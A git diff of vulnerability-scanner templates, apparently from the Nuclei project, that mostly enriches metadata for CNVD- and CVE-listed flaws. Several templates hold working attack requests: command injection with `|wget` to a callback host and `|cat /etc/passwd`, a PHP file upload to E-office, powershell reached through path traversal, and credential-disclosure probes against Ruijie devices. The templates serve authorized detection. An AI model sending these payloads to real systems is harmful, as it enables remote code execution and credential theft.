cwe-id: CWE-77
|
||||
tags: ruijie,cnvd,cnvd2021,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -4,8 +4,9 @@ info:
|
|||
name: EEA Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure,cnvd
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -14,7 +15,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "<username>(.*?)</username>"
|
|
@ -0,0 +1,45 @@
|
|||
id: CNVD-2021-14536
|
||||
|
||||
info:
|
||||
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
||||
reference:
|
||||
- https://www.adminxe.com/2163.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: title="RG-UAC登录页面"
|
||||
tags: ruijie,cnvd,cnvd2021,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/get_dkey.php?user=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"pre_define"'
|
||||
- '"auth_method"'
|
||||
- '"name"'
|
||||
- '"password"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|
||||
|
||||
# Enhanced by mp on 2022/03/28
|
|
@ -4,8 +4,13 @@ info:
|
|||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
tags: shopxo,lfi
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
|
||||
fofa-query: app="ShopXO企业级B2C电商系统提供商"
|
||||
tags: shopxo,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -16,11 +21,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/17
|
|
@ -0,0 +1,36 @@
|
|||
id: CNVD-2021-15824
|
||||
|
||||
info:
|
||||
name: EmpireCMS DOM Cross Site-Scripting
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/empirecms/
|
||||
- https://www.bilibili.com/read/cv10441910
|
||||
- https://vul.wangan.com/a/CNVD-2021-15824
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
tags: empirecms,cnvd,cnvd2021,xss,domxss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'if(Request("url")!=0)'
|
||||
- 'href=\""+Request("url")+"\"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/23
|
|
@ -0,0 +1,36 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
tags: ruijie,disclosure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/16
|
|
@ -0,0 +1,36 @@
|
|||
id: CNVD-2021-26422
|
||||
|
||||
info:
|
||||
name: eYouMail - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: eYouMail is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: eyoumail,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,11 +1,15 @@
|
|||
id: landray-oa-fileread
|
||||
id: CNVD-2021-28277
|
||||
|
||||
info:
|
||||
name: Landray-OA Fileread
|
||||
author: pikpikcu
|
||||
name: Landray-OA Arbitrary - Arbitrary File Retrieval
|
||||
author: pikpikcu,daffainfo
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
tags: landray,lfi
|
||||
reference:
|
||||
- https://www.aisoutu.com/a/1432457
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
metadata:
|
||||
fofa-query: app="Landray OA system"
|
||||
tags: landray,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -25,6 +29,7 @@ requests:
|
|||
|
||||
var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
tags: beanshell,rce,cnvd
|
||||
tags: beanshell,rce,cnvd,cnvd2021,yonyou
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -27,7 +27,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
|
@ -0,0 +1,48 @@
|
|||
id: CNVD-2021-49104
|
||||
|
||||
info:
|
||||
name: Pan Micro E-office File Uploads
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
|
||||
reference:
|
||||
- https://chowdera.com/2021/12/202112200602130067.html
|
||||
- http://v10.e-office.cn
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
|
||||
cvss-score: 9.9
|
||||
cwe-id: CWE-434
|
||||
remediation: Pan Wei has released an update to resolve this vulnerability.
|
||||
tags: pan,micro,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<?php echo md5('CNVD-2021-49104');?>
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4--
|
||||
|
||||
- |
|
||||
GET /images/logo/logo-eoffice.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "94d01a2324ce38a2e29a629c54190f67"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -0,0 +1,49 @@
|
|||
id: CNVD-2022-03672
|
||||
|
||||
info:
|
||||
name: Sunflower Simple and Personal - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://www.1024sou.com/article/741374.html
|
||||
- https://copyfuture.com/blogs-details/202202192249158884
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sunflower,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/rpc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=verify-haras
|
||||
- |
|
||||
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: CID={{cid}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '"verify_string":"(.*)"'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1==200"
|
||||
- "status_code_2==200"
|
||||
- "contains(body_1, 'verify_string')"
|
||||
- "contains(body_2, 'Windows IP')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,27 +0,0 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: medium
|
||||
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
||||
tags: rce,cvnd,catfishcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
|
@ -1,29 +0,0 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
tags: ruijie,disclosure,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
File diff suppressed because it is too large
Load Diff
|
@ -8,6 +8,9 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
remediation: Upgrade to the latest version.
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
|
||||
requests:
|
||||
|
@ -25,3 +28,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -4,22 +4,26 @@ info:
|
|||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-score: 7.4
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 7.4
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
tags: cve,cve2001,network,ssh,openssh
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:22"
|
||||
- "{{Host}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Enhanced by Chris on 2022/01/21
|
||||
|
|
|
@ -5,7 +5,13 @@ info:
|
|||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
reference: https://www.exploit-db.com/exploits/21811
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/21811
|
||||
- http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
|
||||
- http://www.securityfocus.com/bid/5763
|
||||
- http://www.iss.net/security_center/static/10145.php
|
||||
classification:
|
||||
cve-id: CVE-2002-1131
|
||||
tags: xss,squirrelmail,cve,cve2002
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,8 +4,15 @@ info:
|
|||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
- http://security.gentoo.org/glsa/glsa-200405-16.xml
|
||||
- http://www.securityfocus.com/archive/1/361857
|
||||
remediation: Upgrade to the latest version.
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
|
||||
requests:
|
||||
|
@ -28,3 +35,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -1,13 +1,21 @@
|
|||
id: CVE-2005-2428
|
||||
|
||||
info:
|
||||
name: CVE-2005-2428
|
||||
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
|
||||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2005,domino
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,5 +29,7 @@ requests:
|
|||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2005-3344
|
||||
|
||||
info:
|
||||
name: Horde Groupware Unauthenticated Admin Access
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
|
||||
- http://www.debian.org/security/2005/dsa-884
|
||||
- http://www.securityfocus.com/bid/15337/
|
||||
classification:
|
||||
cve-id: CVE-2005-3344
|
||||
tags: horde,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/admin/user.php"
|
||||
- "{{BaseURL}}/admin/user.php"
|
||||
headers:
|
||||
Content-Type: text/html
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Horde :: User Administration</title>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/18
|
|
@ -2,12 +2,16 @@ id: CVE-2005-4385
|
|||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
- http://www.securityfocus.com/bid/15940
|
||||
- http://www.osvdb.org/21850
|
||||
classification:
|
||||
cve-id: CVE-2005-4385
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
|
|
|
@ -2,12 +2,16 @@ id: CVE-2006-1681
|
|||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
- http://secunia.com/advisories/19587
|
||||
- http://www.securityfocus.com/bid/17408
|
||||
classification:
|
||||
cve-id: CVE-2006-1681
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,8 +4,14 @@ info:
|
|||
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
|
||||
reference: https://www.exploit-db.com/exploits/27948
|
||||
description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.'
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/27948
|
||||
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
|
||||
- http://www.squirrelmail.org/security/issue/2006-06-01
|
||||
- http://secunia.com/advisories/20406
|
||||
classification:
|
||||
cve-id: CVE-2006-2842
|
||||
tags: cve2006,lfi,squirrelmail,cve
|
||||
|
||||
requests:
|
||||
|
|
|
@ -2,10 +2,16 @@ id: CVE-2007-0885
|
|||
|
||||
info:
|
||||
name: Rainbow.Zen Jira XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference:
|
||||
- https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
- http://www.securityfocus.com/bid/22503
|
||||
- http://osvdb.org/33683
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
|
||||
classification:
|
||||
cve-id: CVE-2007-0885
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,13 +1,16 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
|
||||
classification:
|
||||
cve-id: CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +23,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,11 +1,18 @@
|
|||
id: CVE-2007-4556
|
||||
|
||||
info:
|
||||
name: Apache Struts2 S2-001 RCE
|
||||
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference: https://www.guildhab.top/?p=2326
|
||||
description: |
|
||||
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference:
|
||||
- https://www.guildhab.top/?p=2326
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
|
||||
- https://cwiki.apache.org/confluence/display/WW/S2-001
|
||||
- http://forums.opensymphony.com/ann.jspa?annID=54
|
||||
classification:
|
||||
cve-id: CVE-2007-4556
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
requests:
|
||||
|
@ -22,9 +29,11 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/10
|
||||
|
|
|
@ -5,10 +5,16 @@ info:
|
|||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
|
||||
tags: cve,cve2007,xss,pgadmin
|
||||
reference: https://www.exploit-db.com/exploits/30090
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30090
|
||||
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
|
||||
- http://www.securityfocus.com/bid/24182
|
||||
- http://secunia.com/advisories/25446
|
||||
classification:
|
||||
cve-id: CVE-2007-5728
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve,cve2007,xss,pgadmin,phppgadmin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,7 +5,13 @@ info:
|
|||
author: unstabl3
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
reference:
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
- http://www.securityfocus.com/bid/29291
|
